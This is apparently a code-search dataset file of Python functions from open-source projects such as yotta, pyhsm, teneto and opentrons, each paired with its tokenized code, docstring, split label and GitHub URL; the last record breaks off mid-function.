[ "def", "upload_data", "(", "self", ",", "file_or_str", ",", "chunk_size", "=", "analyzere", ".", "upload_chunk_size", ",", "poll_interval", "=", "analyzere", ".", "upload_poll_interval", ",", "upload_callback", "=", "lambda", "x", ":", "None", ",", "commit_callback", "=", "lambda", "x", ":", "None", ")", ":", "if", "not", "callable", "(", "upload_callback", ")", ":", "raise", "Exception", "(", "'provided upload_callback is not callable'", ")", "if", "not", "callable", "(", "commit_callback", ")", ":", "raise", "Exception", "(", "'provided commit_callback is not callable'", ")", "file_obj", "=", "StringIO", "(", "file_or_str", ")", "if", "isinstance", "(", "file_or_str", ",", "six", ".", "string_types", ")", "else", "file_or_str", "# Upload file with known entity size if file object supports random", "# access.", "length", "=", "None", "if", "hasattr", "(", "file_obj", ",", "'seek'", ")", ":", "length", "=", "utils", ".", "file_length", "(", "file_obj", ")", "# Initiate upload session", "request_raw", "(", "'post'", ",", "self", ".", "_data_path", ",", "headers", "=", "{", "'Entity-Length'", ":", "str", "(", "length", ")", "}", ")", "else", ":", "request_raw", "(", "'post'", ",", "self", ".", "_data_path", ")", "# Upload chunks", "for", "chunk", ",", "offset", "in", "utils", ".", "read_in_chunks", "(", "file_obj", ",", "chunk_size", ")", ":", "headers", "=", "{", "'Offset'", ":", "str", "(", "offset", ")", ",", "'Content-Type'", ":", "'application/offset+octet-stream'", "}", "request_raw", "(", "'patch'", ",", "self", ".", "_data_path", ",", "headers", "=", "headers", ",", "body", "=", "chunk", ")", "# if there is a known size, and an upload callback, call it", "if", "length", ":", "upload_callback", "(", "offset", "*", "100.0", "/", "length", ")", "upload_callback", "(", "100.0", ")", "# Commit the session", "request_raw", "(", "'post'", ",", "self", ".", "_commit_path", ")", "# Block until data has finished processing", "while", "True", ":", "resp", "=", "self", ".", "upload_status", "if", "(", "resp", ".", "status", "==", "'Processing Successful'", "or", "resp", ".", "status", "==", "'Processing Failed'", ")", ":", "commit_callback", "(", "100.0", ")", "return", "resp", "else", ":", "commit_callback", "(", "float", "(", "resp", ".", "commit_progress", ")", ")", "time", ".", "sleep", "(", "poll_interval", ")" ]
Accepts a file-like object or string and uploads it. Files are automatically uploaded in chunks. The default chunk size is 16MiB and can be overwritten by specifying the number of bytes in the ``chunk_size`` variable. Accepts an optional poll_interval for temporarily overriding the default value `analyzere.upload_poll_interval`. Implements the tus protocol. Takes optional callbacks that return the percentage complete for the given "phase" of upload: upload/commit. Callback values are returned as 10.0 for 10%
[ "Accepts", "a", "file", "-", "like", "object", "or", "string", "and", "uploads", "it", ".", "Files", "are", "automatically", "uploaded", "in", "chunks", ".", "The", "default", "chunk", "size", "is", "16MiB", "and", "can", "be", "overwritten", "by", "specifying", "the", "number", "of", "bytes", "in", "the", "chunk_size", "variable", ".", "Accepts", "an", "optional", "poll_interval", "for", "temporarily", "overriding", "the", "default", "value", "analyzere", ".", "upload_poll_interval", ".", "Implements", "the", "tus", "protocol", ".", "Takes", "optional", "callbacks", "that", "return", "the", "percentage", "complete", "for", "the", "given", "phase", "of", "upload", ":", "upload", "/", "commit", ".", "Callback", "values", "are", "returned", "as", "10", ".", "0", "for", "10%" ]
python
train
43.448276
ARMmbed/yotta
yotta/lib/registry_access.py
https://github.com/ARMmbed/yotta/blob/56bc1e56c602fa20307b23fe27518e9cd6c11af1/yotta/lib/registry_access.py#L536-L553
def unpublish(namespace, name, version, registry=None): ''' Try to unpublish a recently published version. Return any errors that occur. ''' registry = registry or Registry_Base_URL url = '%s/%s/%s/versions/%s' % ( registry, namespace, name, version ) headers = _headersForRegistry(registry) response = requests.delete(url, headers=headers) response.raise_for_status() return None
[ "def", "unpublish", "(", "namespace", ",", "name", ",", "version", ",", "registry", "=", "None", ")", ":", "registry", "=", "registry", "or", "Registry_Base_URL", "url", "=", "'%s/%s/%s/versions/%s'", "%", "(", "registry", ",", "namespace", ",", "name", ",", "version", ")", "headers", "=", "_headersForRegistry", "(", "registry", ")", "response", "=", "requests", ".", "delete", "(", "url", ",", "headers", "=", "headers", ")", "response", ".", "raise_for_status", "(", ")", "return", "None" ]
Try to unpublish a recently published version. Return any errors that occur.
[ "Try", "to", "unpublish", "a", "recently", "published", "version", ".", "Return", "any", "errors", "that", "occur", "." ]
python
valid
24.555556
mapnik/Cascadenik
cascadenik/__init__.py
https://github.com/mapnik/Cascadenik/blob/82f66859340a31dfcb24af127274f262d4f3ad85/cascadenik/__init__.py#L42-L90
def load_map(map, src_file, output_dir, scale=1, cache_dir=None, datasources_cfg=None, user_styles=[], verbose=False): """ Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map(). Parameters: map: Instance of mapnik.Map. src_file: Location of stylesheet .mml file. Can be relative path, absolute path, or fully-qualified URL of a remote stylesheet. output_dir: ... Keyword Parameters: scale: Optional scale value for output map, 2 doubles the size for high-res displays. cache_dir: ... datasources_cfg: ... user_styles: A optional list of files or URLs, that override styles defined in the map source. These are evaluated in order, with declarations from later styles overriding those from earlier styles. verbose: ... """ scheme, n, path, p, q, f = urlparse(src_file) if scheme in ('file', ''): assert exists(src_file), "We'd prefer an input file that exists to one that doesn't" if cache_dir is None: cache_dir = expanduser(CACHE_DIR) # only make the cache dir if it wasn't user-provided if not isdir(cache_dir): mkdir(cache_dir) chmod(cache_dir, 0755) dirs = Directories(output_dir, realpath(cache_dir), dirname(src_file)) compile(src_file, dirs, verbose, datasources_cfg=datasources_cfg, user_styles=user_styles, scale=scale).to_mapnik(map, dirs)
[ "def", "load_map", "(", "map", ",", "src_file", ",", "output_dir", ",", "scale", "=", "1", ",", "cache_dir", "=", "None", ",", "datasources_cfg", "=", "None", ",", "user_styles", "=", "[", "]", ",", "verbose", "=", "False", ")", ":", "scheme", ",", "n", ",", "path", ",", "p", ",", "q", ",", "f", "=", "urlparse", "(", "src_file", ")", "if", "scheme", "in", "(", "'file'", ",", "''", ")", ":", "assert", "exists", "(", "src_file", ")", ",", "\"We'd prefer an input file that exists to one that doesn't\"", "if", "cache_dir", "is", "None", ":", "cache_dir", "=", "expanduser", "(", "CACHE_DIR", ")", "# only make the cache dir if it wasn't user-provided", "if", "not", "isdir", "(", "cache_dir", ")", ":", "mkdir", "(", "cache_dir", ")", "chmod", "(", "cache_dir", ",", "0755", ")", "dirs", "=", "Directories", "(", "output_dir", ",", "realpath", "(", "cache_dir", ")", ",", "dirname", "(", "src_file", ")", ")", "compile", "(", "src_file", ",", "dirs", ",", "verbose", ",", "datasources_cfg", "=", "datasources_cfg", ",", "user_styles", "=", "user_styles", ",", "scale", "=", "scale", ")", ".", "to_mapnik", "(", "map", ",", "dirs", ")" ]
Apply a stylesheet source file to a given mapnik Map instance, like mapnik.load_map(). Parameters: map: Instance of mapnik.Map. src_file: Location of stylesheet .mml file. Can be relative path, absolute path, or fully-qualified URL of a remote stylesheet. output_dir: ... Keyword Parameters: scale: Optional scale value for output map, 2 doubles the size for high-res displays. cache_dir: ... datasources_cfg: ... user_styles: A optional list of files or URLs, that override styles defined in the map source. These are evaluated in order, with declarations from later styles overriding those from earlier styles. verbose: ...
[ "Apply", "a", "stylesheet", "source", "file", "to", "a", "given", "mapnik", "Map", "instance", "like", "mapnik", ".", "load_map", "()", ".", "Parameters", ":", "map", ":", "Instance", "of", "mapnik", ".", "Map", ".", "src_file", ":", "Location", "of", "stylesheet", ".", "mml", "file", ".", "Can", "be", "relative", "path", "absolute", "path", "or", "fully", "-", "qualified", "URL", "of", "a", "remote", "stylesheet", ".", "output_dir", ":", "...", "Keyword", "Parameters", ":", "scale", ":", "Optional", "scale", "value", "for", "output", "map", "2", "doubles", "the", "size", "for", "high", "-", "res", "displays", ".", "cache_dir", ":", "...", "datasources_cfg", ":", "...", "user_styles", ":", "A", "optional", "list", "of", "files", "or", "URLs", "that", "override", "styles", "defined", "in", "the", "map", "source", ".", "These", "are", "evaluated", "in", "order", "with", "declarations", "from", "later", "styles", "overriding", "those", "from", "earlier", "styles", ".", "verbose", ":", "..." ]
python
train
33.673469
bitesofcode/projex
projex/cli.py
https://github.com/bitesofcode/projex/blob/d31743ec456a41428709968ab11a2cf6c6c76247/projex/cli.py#L281-L302
def parser(scope, usage=''): """ Generates a default parser for the inputted scope. :param scope | <dict> || <module> usage | <str> callable | <str> :return <OptionParser> """ subcmds = [] for cmd in commands(scope): subcmds.append(cmd.usage()) if subcmds: subcmds.sort() usage += '\n\nSub-Commands:\n ' usage += '\n '.join(subcmds) parse = PARSER_CLASS(usage=usage) parse.prog = PROGRAM_NAME return parse
[ "def", "parser", "(", "scope", ",", "usage", "=", "''", ")", ":", "subcmds", "=", "[", "]", "for", "cmd", "in", "commands", "(", "scope", ")", ":", "subcmds", ".", "append", "(", "cmd", ".", "usage", "(", ")", ")", "if", "subcmds", ":", "subcmds", ".", "sort", "(", ")", "usage", "+=", "'\\n\\nSub-Commands:\\n '", "usage", "+=", "'\\n '", ".", "join", "(", "subcmds", ")", "parse", "=", "PARSER_CLASS", "(", "usage", "=", "usage", ")", "parse", ".", "prog", "=", "PROGRAM_NAME", "return", "parse" ]
Generates a default parser for the inputted scope. :param scope | <dict> || <module> usage | <str> callable | <str> :return <OptionParser>
[ "Generates", "a", "default", "parser", "for", "the", "inputted", "scope", ".", ":", "param", "scope", "|", "<dict", ">", "||", "<module", ">", "usage", "|", "<str", ">", "callable", "|", "<str", ">", ":", "return", "<OptionParser", ">" ]
python
train
23.681818
Yubico/python-pyhsm
pyhsm/aead_cmd.py
https://github.com/Yubico/python-pyhsm/blob/b6e2744d1ea15c352a0fc1d6ebc5950026b71311/pyhsm/aead_cmd.py#L58-L84
def parse_result(self, data): """ Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed. """ # typedef struct { # uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs) # uint32_t keyHandle; // Key handle # YSM_STATUS status; // Status # uint8_t numBytes; // Number of bytes in AEAD block # uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block # } YSM_AEAD_GENERATE_RESP; nonce, \ key_handle, \ self.status, \ num_bytes = struct.unpack_from("< %is I B B" % (pyhsm.defines.YSM_AEAD_NONCE_SIZE), data, 0) pyhsm.util.validate_cmd_response_hex('key_handle', key_handle, self.key_handle) if self.status == pyhsm.defines.YSM_STATUS_OK: pyhsm.util.validate_cmd_response_nonce(nonce, self.nonce) offset = pyhsm.defines.YSM_AEAD_NONCE_SIZE + 6 aead = data[offset:offset + num_bytes] self.response = YHSM_GeneratedAEAD(nonce, key_handle, aead) return self.response else: raise pyhsm.exception.YHSM_CommandFailed(pyhsm.defines.cmd2str(self.command), self.status)
[ "def", "parse_result", "(", "self", ",", "data", ")", ":", "# typedef struct {", "# uint8_t nonce[YSM_AEAD_NONCE_SIZE]; // Nonce (publicId for Yubikey AEADs)", "# uint32_t keyHandle; // Key handle", "# YSM_STATUS status; // Status", "# uint8_t numBytes; // Number of bytes in AEAD block", "# uint8_t aead[YSM_AEAD_MAX_SIZE]; // AEAD block", "# } YSM_AEAD_GENERATE_RESP;", "nonce", ",", "key_handle", ",", "self", ".", "status", ",", "num_bytes", "=", "struct", ".", "unpack_from", "(", "\"< %is I B B\"", "%", "(", "pyhsm", ".", "defines", ".", "YSM_AEAD_NONCE_SIZE", ")", ",", "data", ",", "0", ")", "pyhsm", ".", "util", ".", "validate_cmd_response_hex", "(", "'key_handle'", ",", "key_handle", ",", "self", ".", "key_handle", ")", "if", "self", ".", "status", "==", "pyhsm", ".", "defines", ".", "YSM_STATUS_OK", ":", "pyhsm", ".", "util", ".", "validate_cmd_response_nonce", "(", "nonce", ",", "self", ".", "nonce", ")", "offset", "=", "pyhsm", ".", "defines", ".", "YSM_AEAD_NONCE_SIZE", "+", "6", "aead", "=", "data", "[", "offset", ":", "offset", "+", "num_bytes", "]", "self", ".", "response", "=", "YHSM_GeneratedAEAD", "(", "nonce", ",", "key_handle", ",", "aead", ")", "return", "self", ".", "response", "else", ":", "raise", "pyhsm", ".", "exception", ".", "YHSM_CommandFailed", "(", "pyhsm", ".", "defines", ".", "cmd2str", "(", "self", ".", "command", ")", ",", "self", ".", "status", ")" ]
Returns a YHSM_GeneratedAEAD instance, or throws pyhsm.exception.YHSM_CommandFailed.
[ "Returns", "a", "YHSM_GeneratedAEAD", "instance", "or", "throws", "pyhsm", ".", "exception", ".", "YHSM_CommandFailed", "." ]
python
train
46.481481
kbr/fritzconnection
fritzconnection/fritzstatus.py
https://github.com/kbr/fritzconnection/blob/b183f759ef19dd1652371e912d36cfe34f6639ac/fritzconnection/fritzstatus.py#L118-L124
def str_transmission_rate(self): """Returns a tuple of human readable transmission rates in bytes.""" upstream, downstream = self.transmission_rate return ( fritztools.format_num(upstream), fritztools.format_num(downstream) )
[ "def", "str_transmission_rate", "(", "self", ")", ":", "upstream", ",", "downstream", "=", "self", ".", "transmission_rate", "return", "(", "fritztools", ".", "format_num", "(", "upstream", ")", ",", "fritztools", ".", "format_num", "(", "downstream", ")", ")" ]
Returns a tuple of human readable transmission rates in bytes.
[ "Returns", "a", "tuple", "of", "human", "readable", "transmission", "rates", "in", "bytes", "." ]
python
train
39.285714
wiheto/teneto
teneto/classes/bids.py
https://github.com/wiheto/teneto/blob/80d7a83a9adc1714589b020627c45bd5b66248ab/teneto/classes/bids.py#L221-L320
def _derive_temporalnetwork(self, f, i, tag, params, confounds_exist, confound_files): """ Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing. """ data = load_tabular_file(f, index_col=True, header=True) fs, _ = drop_bids_suffix(f) save_name, save_dir, _ = self._save_namepaths_bids_derivatives( fs, tag, 'tvc', 'tvcconn') if 'weight-var' in params.keys(): if params['weight-var'] == 'from-subject-fc': fc_files = self.get_selected_files( quiet=1, pipeline='functionalconnectivity', forfile=f) if len(fc_files) == 1: # Could change to load_data call params['weight-var'] = load_tabular_file( fc_files[0]).values else: raise ValueError('Cannot correctly find FC files') if 'weight-mean' in params.keys(): if params['weight-mean'] == 'from-subject-fc': fc_files = self.get_selected_files( quiet=1, pipeline='functionalconnectivity', forfile=f) if len(fc_files) == 1: # Could change to load_data call params['weight-mean'] = load_tabular_file( fc_files[0]).values else: raise ValueError('Cannot correctly find FC files') params['report'] = 'yes' params['report_path'] = save_dir + '/report/' params['report_filename'] = save_name + '_derivationreport.html' if not os.path.exists(params['report_path']): os.makedirs(params['report_path']) if 'dimord' not in params: params['dimord'] = 'time,node' dfc = teneto.timeseries.derive_temporalnetwork(data.values, params) dfc_net = TemporalNetwork(from_array=dfc, nettype='wu') dfc_net.network.to_csv(save_dir + save_name + '.tsv', sep='\t') sidecar = get_sidecar(f) sidecar['tvc'] = params if 'weight-var' in sidecar['tvc']: sidecar['tvc']['weight-var'] = True sidecar['tvc']['fc source'] = fc_files if 'weight-mean' in sidecar['tvc']: sidecar['tvc']['weight-mean'] = True sidecar['tvc']['fc source'] = fc_files sidecar['tvc']['inputfile'] = f sidecar['tvc']['description'] = 'Time varying connectivity information.' with open(save_dir + save_name + '.json', 'w') as fs: json.dump(sidecar, fs) if confounds_exist: analysis_step = 'tvc-derive' df = pd.read_csv(confound_files[i], sep='\t') df = df.fillna(df.median()) ind = np.triu_indices(dfc.shape[0], k=1) dfc_df = pd.DataFrame(dfc[ind[0], ind[1], :].transpose()) # If windowed, prune df so that it matches with dfc_df if len(df) != len(dfc_df): df = df.iloc[int(np.round((params['windowsize']-1)/2)): int(np.round((params['windowsize']-1)/2)+len(dfc_df))] df.reset_index(inplace=True, drop=True) # NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF. dfc_df_z = (dfc_df - dfc_df.mean()) df_z = (df - df.mean()) R_df = dfc_df_z.T.dot(df_z).div(len(dfc_df)).div( df_z.std(ddof=0)).div(dfc_df_z.std(ddof=0), axis=0) R_df_describe = R_df.describe() desc_index = R_df_describe.index confound_report_dir = params['report_path'] + \ '/' + save_name + '_confoundcorr/' confound_report_figdir = confound_report_dir + 'figures/' if not os.path.exists(confound_report_figdir): os.makedirs(confound_report_figdir) report = '<html><body>' report += '<h1> Correlation of ' + analysis_step + ' and confounds.</h1>' for c in R_df.columns: fig, ax = plt.subplots(1) ax = sns.distplot( R_df[c], hist=False, color='m', ax=ax, kde_kws={"shade": True}) fig.savefig(confound_report_figdir + c + '.png') plt.close(fig) report += '<h2>' + c + '</h2>' for ind_name, r in enumerate(R_df_describe[c]): report += str(desc_index[ind_name]) + ': ' report += str(r) + '<br>' report += 'Distribution of corrlation values:' report += '<img src=' + \ os.path.abspath(confound_report_figdir) + \ '/' + c + '.png><br><br>' report += '</body></html>' with open(confound_report_dir + save_name + '_confoundcorr.html', 'w') as file: file.write(report)
[ "def", "_derive_temporalnetwork", "(", "self", ",", "f", ",", "i", ",", "tag", ",", "params", ",", "confounds_exist", ",", "confound_files", ")", ":", "data", "=", "load_tabular_file", "(", "f", ",", "index_col", "=", "True", ",", "header", "=", "True", ")", "fs", ",", "_", "=", "drop_bids_suffix", "(", "f", ")", "save_name", ",", "save_dir", ",", "_", "=", "self", ".", "_save_namepaths_bids_derivatives", "(", "fs", ",", "tag", ",", "'tvc'", ",", "'tvcconn'", ")", "if", "'weight-var'", "in", "params", ".", "keys", "(", ")", ":", "if", "params", "[", "'weight-var'", "]", "==", "'from-subject-fc'", ":", "fc_files", "=", "self", ".", "get_selected_files", "(", "quiet", "=", "1", ",", "pipeline", "=", "'functionalconnectivity'", ",", "forfile", "=", "f", ")", "if", "len", "(", "fc_files", ")", "==", "1", ":", "# Could change to load_data call", "params", "[", "'weight-var'", "]", "=", "load_tabular_file", "(", "fc_files", "[", "0", "]", ")", ".", "values", "else", ":", "raise", "ValueError", "(", "'Cannot correctly find FC files'", ")", "if", "'weight-mean'", "in", "params", ".", "keys", "(", ")", ":", "if", "params", "[", "'weight-mean'", "]", "==", "'from-subject-fc'", ":", "fc_files", "=", "self", ".", "get_selected_files", "(", "quiet", "=", "1", ",", "pipeline", "=", "'functionalconnectivity'", ",", "forfile", "=", "f", ")", "if", "len", "(", "fc_files", ")", "==", "1", ":", "# Could change to load_data call", "params", "[", "'weight-mean'", "]", "=", "load_tabular_file", "(", "fc_files", "[", "0", "]", ")", ".", "values", "else", ":", "raise", "ValueError", "(", "'Cannot correctly find FC files'", ")", "params", "[", "'report'", "]", "=", "'yes'", "params", "[", "'report_path'", "]", "=", "save_dir", "+", "'/report/'", "params", "[", "'report_filename'", "]", "=", "save_name", "+", "'_derivationreport.html'", "if", "not", "os", ".", "path", ".", "exists", "(", "params", "[", "'report_path'", "]", ")", ":", "os", ".", "makedirs", "(", "params", "[", "'report_path'", "]", ")", "if", "'dimord'", "not", "in", "params", ":", "params", "[", "'dimord'", "]", "=", "'time,node'", "dfc", "=", "teneto", ".", "timeseries", ".", "derive_temporalnetwork", "(", "data", ".", "values", ",", "params", ")", "dfc_net", "=", "TemporalNetwork", "(", "from_array", "=", "dfc", ",", "nettype", "=", "'wu'", ")", "dfc_net", ".", "network", ".", "to_csv", "(", "save_dir", "+", "save_name", "+", "'.tsv'", ",", "sep", "=", "'\\t'", ")", "sidecar", "=", "get_sidecar", "(", "f", ")", "sidecar", "[", "'tvc'", "]", "=", "params", "if", "'weight-var'", "in", "sidecar", "[", "'tvc'", "]", ":", "sidecar", "[", "'tvc'", "]", "[", "'weight-var'", "]", "=", "True", "sidecar", "[", "'tvc'", "]", "[", "'fc source'", "]", "=", "fc_files", "if", "'weight-mean'", "in", "sidecar", "[", "'tvc'", "]", ":", "sidecar", "[", "'tvc'", "]", "[", "'weight-mean'", "]", "=", "True", "sidecar", "[", "'tvc'", "]", "[", "'fc source'", "]", "=", "fc_files", "sidecar", "[", "'tvc'", "]", "[", "'inputfile'", "]", "=", "f", "sidecar", "[", "'tvc'", "]", "[", "'description'", "]", "=", "'Time varying connectivity information.'", "with", "open", "(", "save_dir", "+", "save_name", "+", "'.json'", ",", "'w'", ")", "as", "fs", ":", "json", ".", "dump", "(", "sidecar", ",", "fs", ")", "if", "confounds_exist", ":", "analysis_step", "=", "'tvc-derive'", "df", "=", "pd", ".", "read_csv", "(", "confound_files", "[", "i", "]", ",", "sep", "=", "'\\t'", ")", "df", "=", "df", ".", "fillna", "(", "df", ".", "median", "(", ")", ")", "ind", "=", "np", ".", "triu_indices", "(", "dfc", ".", "shape", "[", "0", "]", ",", "k", "=", "1", ")", "dfc_df", "=", "pd", ".", "DataFrame", "(", "dfc", "[", "ind", "[", "0", "]", ",", "ind", "[", "1", "]", ",", ":", "]", ".", "transpose", "(", ")", ")", "# If windowed, prune df so that it matches with dfc_df", "if", "len", "(", "df", ")", "!=", "len", "(", "dfc_df", ")", ":", "df", "=", "df", ".", "iloc", "[", "int", "(", "np", ".", "round", "(", "(", "params", "[", "'windowsize'", "]", "-", "1", ")", "/", "2", ")", ")", ":", "int", "(", "np", ".", "round", "(", "(", "params", "[", "'windowsize'", "]", "-", "1", ")", "/", "2", ")", "+", "len", "(", "dfc_df", ")", ")", "]", "df", ".", "reset_index", "(", "inplace", "=", "True", ",", "drop", "=", "True", ")", "# NOW CORRELATE DF WITH DFC BUT ALONG INDEX NOT DF.", "dfc_df_z", "=", "(", "dfc_df", "-", "dfc_df", ".", "mean", "(", ")", ")", "df_z", "=", "(", "df", "-", "df", ".", "mean", "(", ")", ")", "R_df", "=", "dfc_df_z", ".", "T", ".", "dot", "(", "df_z", ")", ".", "div", "(", "len", "(", "dfc_df", ")", ")", ".", "div", "(", "df_z", ".", "std", "(", "ddof", "=", "0", ")", ")", ".", "div", "(", "dfc_df_z", ".", "std", "(", "ddof", "=", "0", ")", ",", "axis", "=", "0", ")", "R_df_describe", "=", "R_df", ".", "describe", "(", ")", "desc_index", "=", "R_df_describe", ".", "index", "confound_report_dir", "=", "params", "[", "'report_path'", "]", "+", "'/'", "+", "save_name", "+", "'_confoundcorr/'", "confound_report_figdir", "=", "confound_report_dir", "+", "'figures/'", "if", "not", "os", ".", "path", ".", "exists", "(", "confound_report_figdir", ")", ":", "os", ".", "makedirs", "(", "confound_report_figdir", ")", "report", "=", "'<html><body>'", "report", "+=", "'<h1> Correlation of '", "+", "analysis_step", "+", "' and confounds.</h1>'", "for", "c", "in", "R_df", ".", "columns", ":", "fig", ",", "ax", "=", "plt", ".", "subplots", "(", "1", ")", "ax", "=", "sns", ".", "distplot", "(", "R_df", "[", "c", "]", ",", "hist", "=", "False", ",", "color", "=", "'m'", ",", "ax", "=", "ax", ",", "kde_kws", "=", "{", "\"shade\"", ":", "True", "}", ")", "fig", ".", "savefig", "(", "confound_report_figdir", "+", "c", "+", "'.png'", ")", "plt", ".", "close", "(", "fig", ")", "report", "+=", "'<h2>'", "+", "c", "+", "'</h2>'", "for", "ind_name", ",", "r", "in", "enumerate", "(", "R_df_describe", "[", "c", "]", ")", ":", "report", "+=", "str", "(", "desc_index", "[", "ind_name", "]", ")", "+", "': '", "report", "+=", "str", "(", "r", ")", "+", "'<br>'", "report", "+=", "'Distribution of corrlation values:'", "report", "+=", "'<img src='", "+", "os", ".", "path", ".", "abspath", "(", "confound_report_figdir", ")", "+", "'/'", "+", "c", "+", "'.png><br><br>'", "report", "+=", "'</body></html>'", "with", "open", "(", "confound_report_dir", "+", "save_name", "+", "'_confoundcorr.html'", ",", "'w'", ")", "as", "file", ":", "file", ".", "write", "(", "report", ")" ]
Funciton called by TenetoBIDS.derive_temporalnetwork for concurrent processing.
[ "Funciton", "called", "by", "TenetoBIDS", ".", "derive_temporalnetwork", "for", "concurrent", "processing", "." ]
python
train
47.32
DataONEorg/d1_python
lib_client/src/d1_client/solr_client.py
https://github.com/DataONEorg/d1_python/blob/3ac4d4f3ca052d3e8641a6a329cab526c8ddcb0d/lib_client/src/d1_client/solr_client.py#L506-L510
def _post_query(self, **query_dict): """Perform a POST query against Solr and return the response as a Python dict.""" param_dict = query_dict.copy() return self._send_query(do_post=True, **param_dict)
[ "def", "_post_query", "(", "self", ",", "*", "*", "query_dict", ")", ":", "param_dict", "=", "query_dict", ".", "copy", "(", ")", "return", "self", ".", "_send_query", "(", "do_post", "=", "True", ",", "*", "*", "param_dict", ")" ]
Perform a POST query against Solr and return the response as a Python dict.
[ "Perform", "a", "POST", "query", "against", "Solr", "and", "return", "the", "response", "as", "a", "Python", "dict", "." ]
python
train
45.8
bwhite/hadoopy
hadoopy/thirdparty/pyinstaller/PyInstaller/compat.py
https://github.com/bwhite/hadoopy/blob/ff39b4e6d4e6efaf1f571cf0f2c0e0d7ab28c2d6/hadoopy/thirdparty/pyinstaller/PyInstaller/compat.py#L197-L204
def exec_python_rc(*args, **kwargs): """ Wrap running python script in a subprocess. Return exit code of the invoked command. """ cmdargs, kwargs = __wrap_python(args, kwargs) return exec_command_rc(*cmdargs, **kwargs)
[ "def", "exec_python_rc", "(", "*", "args", ",", "*", "*", "kwargs", ")", ":", "cmdargs", ",", "kwargs", "=", "__wrap_python", "(", "args", ",", "kwargs", ")", "return", "exec_command_rc", "(", "*", "cmdargs", ",", "*", "*", "kwargs", ")" ]
Wrap running python script in a subprocess. Return exit code of the invoked command.
[ "Wrap", "running", "python", "script", "in", "a", "subprocess", "." ]
python
train
29.5
Opentrons/opentrons
api/src/opentrons/legacy_api/instruments/pipette.py
https://github.com/Opentrons/opentrons/blob/a7c15cc2636ecb64ab56c7edc1d8a57163aaeadf/api/src/opentrons/legacy_api/instruments/pipette.py#L250-L268
def reset_tip_tracking(self): """ Resets the :any:`Pipette` tip tracking, "refilling" the tip racks """ self.current_tip(None) self.tip_rack_iter = iter([]) if self.has_tip_rack(): iterables = self.tip_racks if self.channels > 1: iterables = [c for rack in self.tip_racks for c in rack.cols] else: iterables = [w for rack in self.tip_racks for w in rack] if self.starting_tip: iterables = iterables[iterables.index(self.starting_tip):] self.tip_rack_iter = itertools.chain(iterables)
[ "def", "reset_tip_tracking", "(", "self", ")", ":", "self", ".", "current_tip", "(", "None", ")", "self", ".", "tip_rack_iter", "=", "iter", "(", "[", "]", ")", "if", "self", ".", "has_tip_rack", "(", ")", ":", "iterables", "=", "self", ".", "tip_racks", "if", "self", ".", "channels", ">", "1", ":", "iterables", "=", "[", "c", "for", "rack", "in", "self", ".", "tip_racks", "for", "c", "in", "rack", ".", "cols", "]", "else", ":", "iterables", "=", "[", "w", "for", "rack", "in", "self", ".", "tip_racks", "for", "w", "in", "rack", "]", "if", "self", ".", "starting_tip", ":", "iterables", "=", "iterables", "[", "iterables", ".", "index", "(", "self", ".", "starting_tip", ")", ":", "]", "self", ".", "tip_rack_iter", "=", "itertools", ".", "chain", "(", "iterables", ")" ]
Resets the :any:`Pipette` tip tracking, "refilling" the tip racks
[ "Resets", "the", ":", "any", ":", "Pipette", "tip", "tracking", "refilling", "the", "tip", "racks" ]
python
train
32.894737
bolt-project/bolt
bolt/spark/chunk.py
https://github.com/bolt-project/bolt/blob/9cd7104aa085498da3097b72696184b9d3651c51/bolt/spark/chunk.py#L434-L512
def getplan(self, size="150", axes=None, padding=None): """ Identify a plan for chunking values along each dimension. Generates an ndarray with the size (in number of elements) of chunks in each dimension. If provided, will estimate chunks for only a subset of axes, leaving all others to the full size of the axis. Parameters ---------- size : string or tuple If str, the average size (in KB) of the chunks in all value dimensions. If int/tuple, an explicit specification of the number chunks in each moving value dimension. axes : tuple, optional, default=None One or more axes to estimate chunks for, if provided any other axes will use one chunk. padding : tuple or int, option, default=None Size over overlapping padding between chunks in each dimension. If tuple, specifies padding along each chunked dimension; if int, all dimensions use same padding; if None, no padding """ from numpy import dtype as gettype # initialize with all elements in one chunk plan = self.vshape # check for subset of axes if axes is None: if isinstance(size, str): axes = arange(len(self.vshape)) else: axes = arange(len(size)) else: axes = asarray(axes, 'int') # set padding pad = array(len(self.vshape)*[0, ]) if padding is not None: pad[axes] = padding # set the plan if isinstance(size, tuple): plan[axes] = size elif isinstance(size, str): # convert from kilobytes size = 1000.0 * float(size) # calculate from dtype elsize = gettype(self.dtype).itemsize nelements = prod(self.vshape) dims = self.vshape[self.vmask(axes)] if size <= elsize: s = ones(len(axes)) else: remsize = 1.0 * nelements * elsize s = [] for (i, d) in enumerate(dims): minsize = remsize/d if minsize >= size: s.append(1) remsize = minsize continue else: s.append(min(d, floor(size/minsize))) s[i+1:] = plan[i+1:] break plan[axes] = s else: raise ValueError("Chunk size not understood, must be tuple or int") return plan, pad
[ "def", "getplan", "(", "self", ",", "size", "=", "\"150\"", ",", "axes", "=", "None", ",", "padding", "=", "None", ")", ":", "from", "numpy", "import", "dtype", "as", "gettype", "# initialize with all elements in one chunk", "plan", "=", "self", ".", "vshape", "# check for subset of axes", "if", "axes", "is", "None", ":", "if", "isinstance", "(", "size", ",", "str", ")", ":", "axes", "=", "arange", "(", "len", "(", "self", ".", "vshape", ")", ")", "else", ":", "axes", "=", "arange", "(", "len", "(", "size", ")", ")", "else", ":", "axes", "=", "asarray", "(", "axes", ",", "'int'", ")", "# set padding", "pad", "=", "array", "(", "len", "(", "self", ".", "vshape", ")", "*", "[", "0", ",", "]", ")", "if", "padding", "is", "not", "None", ":", "pad", "[", "axes", "]", "=", "padding", "# set the plan", "if", "isinstance", "(", "size", ",", "tuple", ")", ":", "plan", "[", "axes", "]", "=", "size", "elif", "isinstance", "(", "size", ",", "str", ")", ":", "# convert from kilobytes", "size", "=", "1000.0", "*", "float", "(", "size", ")", "# calculate from dtype", "elsize", "=", "gettype", "(", "self", ".", "dtype", ")", ".", "itemsize", "nelements", "=", "prod", "(", "self", ".", "vshape", ")", "dims", "=", "self", ".", "vshape", "[", "self", ".", "vmask", "(", "axes", ")", "]", "if", "size", "<=", "elsize", ":", "s", "=", "ones", "(", "len", "(", "axes", ")", ")", "else", ":", "remsize", "=", "1.0", "*", "nelements", "*", "elsize", "s", "=", "[", "]", "for", "(", "i", ",", 